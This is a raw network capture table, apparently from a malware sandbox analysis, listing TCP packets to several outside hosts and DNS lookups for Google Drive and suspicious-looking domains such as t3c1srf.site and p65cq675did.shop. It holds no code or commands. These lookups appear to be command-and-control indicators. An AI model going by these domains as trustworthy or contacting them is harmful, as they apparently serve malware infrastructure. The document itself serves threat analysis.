Feb 28, 2024 15:50:36.941797972 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941852093 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941905022 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941905975 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.941961050 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.942013979 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.942068100 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.942085028 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.942085981 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.942200899 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.942202091 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.942538977 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.173860073 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.173935890 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.173995972 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174050093 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174104929 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174160004 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174213886 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174268007 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174320936 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174329996 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.174329996 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.174379110 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174432993 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174485922 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174498081 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.174539089 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174593925 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174645901 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174669027 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.174669027 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.174700975 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174755096 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174808025 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174844027 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.174860954 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174915075 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.174968004 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175008059 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175008059 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175020933 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175076008 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175127983 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175179958 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175192118 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175232887 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175288916 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175343037 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175348043 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175395966 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175451040 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.175518036 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175518990 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175693989 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.175860882 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.185667992 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.185745955 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.185802937 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.185856104 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.185909986 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.185964108 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.186017990 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.186070919 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.186125040 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.186180115 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.186217070 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.186217070 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.186217070 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.186383963 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.186556101 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.412751913 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413081884 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413152933 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413209915 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413264990 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413319111 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413372993 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413400888 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.413427114 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413482904 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413537025 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413594007 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.413606882 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413665056 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413693905 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.413693905 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.413693905 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.413717985 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413773060 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413826942 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413882017 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413935900 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.413989067 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414041042 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414076090 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414076090 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414093971 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414148092 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414201975 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414244890 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414256096 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414309978 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414361954 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414413929 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414413929 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414468050 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414520979 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414573908 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414608002 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414628983 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414681911 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414733887 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414776087 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414776087 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414787054 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414840937 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414894104 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.414926052 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414926052 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.414947987 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415002108 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415055037 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415102005 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415107965 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415102005 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415162086 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415219069 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415266037 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415271997 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415266991 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415326118 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415379047 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415431976 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415437937 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415486097 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415539026 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415592909 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415604115 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415647030 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415702105 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.415781975 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415781975 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415951967 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.415952921 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.423326015 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.423652887 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.423724890 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.423779964 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.423850060 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.423906088 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.423906088 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.423960924 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424015045 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424067974 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424076080 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424122095 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424176931 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424228907 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424240112 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424283028 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424339056 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424391985 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424408913 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424410105 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424444914 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424551964 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424552917 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424559116 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424752951 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424752951 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.424789906 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424797058 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424798965 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424801111 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424851894 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424900055 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:37.424925089 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.425120115 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.425257921 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.425425053 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:37.661304951 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:42.430216074 CET	50285	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:42.623836040 CET	80	50285	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:42.624010086 CET	50285	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:42.624191046 CET	50285	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:42.814711094 CET	80	50285	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:42.900127888 CET	80	50285	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:42.900170088 CET	80	50285	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:42.900325060 CET	50285	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:44.132544994 CET	50285	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:45.148200989 CET	50286	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:45.344613075 CET	80	50286	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:45.344882011 CET	50286	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:45.345082998 CET	50286	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:45.542224884 CET	80	50286	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:45.616864920 CET	80	50286	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:45.617139101 CET	80	50286	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:45.617352009 CET	50286	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:46.850739002 CET	50286	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:47.866394043 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.068970919 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.069192886 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.070561886 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.070740938 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.272952080 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.273013115 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.273056030 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.273102045 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.273121119 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.273169041 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.273214102 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.273277998 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.273319006 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.273386955 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.273560047 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.475888968 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.475986004 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476104975 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.476222992 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.476315022 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476366997 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476414919 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476454973 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476583958 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.476739883 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:48.476794004 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476843119 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.476982117 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.477049112 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.477750063 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.518838882 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.683768034 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.684308052 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.684346914 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.684791088 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.684829950 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.781225920 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.781327009 CET	80	50287	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:48.781570911 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:49.584538937 CET	50287	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:50.600294113 CET	50288	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:50.809472084 CET	80	50288	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:50.809773922 CET	50288	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:50.810014009 CET	50288	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:51.019563913 CET	80	50288	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:51.096242905 CET	80	50288	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:51.096342087 CET	80	50288	198.177.123.106	192.168.11.20
Feb 28, 2024 15:50:51.096637964 CET	50288	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:51.096712112 CET	50288	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:50:51.305334091 CET	80	50288	198.177.123.106	192.168.11.20
Feb 28, 2024 15:51:04.727811098 CET	50289	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:05.029885054 CET	80	50289	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:05.030174017 CET	50289	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:05.030308962 CET	50289	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:05.333079100 CET	80	50289	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:05.333148003 CET	80	50289	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:05.333489895 CET	50289	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:06.533934116 CET	50289	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:08.315388918 CET	50290	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:08.620106936 CET	80	50290	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:08.620704889 CET	50290	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:08.620886087 CET	50290	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:08.925905943 CET	80	50290	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:08.925971985 CET	80	50290	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:08.926541090 CET	50290	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:10.126854897 CET	50290	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:11.142533064 CET	50291	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:51:11.444147110 CET	80	50291	91.195.240.19	192.168.11.20
Feb 28, 2024 15:51:11.444489002 CET	50291	80	192.168.11.20	91.195.240.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 28, 2024 15:43:33.669373989 CET	50684	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:43:33.826210022 CET	53	50684	1.1.1.1	192.168.11.20
Feb 28, 2024 15:43:34.652843952 CET	56405	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:43:34.810404062 CET	53	56405	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:00.590615988 CET	57777	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:00.752692938 CET	53	57777	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:05.766469955 CET	65308	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:05.926825047 CET	53	65308	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:10.937237024 CET	55741	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:11.097393036 CET	53	55741	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:16.108042955 CET	63740	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:16.638669968 CET	53	63740	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:22.704668999 CET	63093	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:23.265741110 CET	53	63093	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:28.292795897 CET	52110	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:29.282967091 CET	53	52110	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:50.399286032 CET	55185	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:51.338709116 CET	53	55185	1.1.1.1	192.168.11.20
Feb 28, 2024 15:44:58.379962921 CET	51280	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:44:58.542633057 CET	53	51280	1.1.1.1	192.168.11.20
Feb 28, 2024 15:45:08.893848896 CET	57199	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:45:09.157095909 CET	53	57199	1.1.1.1	192.168.11.20
Feb 28, 2024 15:45:22.562473059 CET	61933	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:45:22.862580061 CET	53	61933	1.1.1.1	192.168.11.20
Feb 28, 2024 15:45:38.449450970 CET	58136	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:45:38.611819029 CET	53	58136	1.1.1.1	192.168.11.20
Feb 28, 2024 15:45:57.304795980 CET	52781	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:45:57.464589119 CET	53	52781	1.1.1.1	192.168.11.20
Feb 28, 2024 15:46:05.522085905 CET	53234	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:46:05.986959934 CET	53	53234	1.1.1.1	192.168.11.20
Feb 28, 2024 15:46:20.190332890 CET	49443	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:46:20.767900944 CET	53	49443	1.1.1.1	192.168.11.20
Feb 28, 2024 15:46:34.984133005 CET	54888	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:46:35.602947950 CET	53	54888	1.1.1.1	192.168.11.20
Feb 28, 2024 15:46:50.105645895 CET	54855	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:46:50.509219885 CET	53	54855	1.1.1.1	192.168.11.20
Feb 28, 2024 15:47:04.946296930 CET	52534	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:47:05.961306095 CET	52534	53	192.168.11.20	9.9.9.9
Feb 28, 2024 15:47:06.247855902 CET	53	52534	1.1.1.1	192.168.11.20
Feb 28, 2024 15:47:08.538935900 CET	53	52534	9.9.9.9	192.168.11.20
Feb 28, 2024 15:47:20.411561966 CET	54686	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:47:21.004848957 CET	53	54686	1.1.1.1	192.168.11.20
Feb 28, 2024 15:47:38.501622915 CET	54789	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:47:38.664890051 CET	53	54789	1.1.1.1	192.168.11.20
Feb 28, 2024 15:47:43.672039986 CET	57626	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:47:43.832392931 CET	53	57626	1.1.1.1	192.168.11.20
Feb 28, 2024 15:47:51.889348984 CET	63410	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:47:52.048612118 CET	53	63410	1.1.1.1	192.168.11.20
Feb 28, 2024 15:50:56.099240065 CET	50295	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:50:56.260061979 CET	53	50295	1.1.1.1	192.168.11.20
Feb 28, 2024 15:51:04.316184044 CET	51959	53	192.168.11.20	1.1.1.1
Feb 28, 2024 15:51:04.727082014 CET	53	51959	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 28, 2024 15:43:33.669373989 CET	192.168.11.20	1.1.1.1	0xf265	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:43:34.652843952 CET	192.168.11.20	1.1.1.1	0x8bc3	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:00.590615988 CET	192.168.11.20	1.1.1.1	0xbdb	Standard query (0)	www.mehr-neukunden.online	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:05.766469955 CET	192.168.11.20	1.1.1.1	0xba09	Standard query (0)	www.midwestnationalflying.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:10.937237024 CET	192.168.11.20	1.1.1.1	0xb55f	Standard query (0)	www.artcitytheatre.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:16.108042955 CET	192.168.11.20	1.1.1.1	0x5ac5	Standard query (0)	www.t3c1srf.site	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:22.704668999 CET	192.168.11.20	1.1.1.1	0xe837	Standard query (0)	www.t3c1srf.site	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:28.292795897 CET	192.168.11.20	1.1.1.1	0x1d1e	Standard query (0)	www.p65cq675did.shop	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:50.399286032 CET	192.168.11.20	1.1.1.1	0xd0f4	Standard query (0)	www.p65cq675did.shop	A (IP address)	IN (0x0001)	false
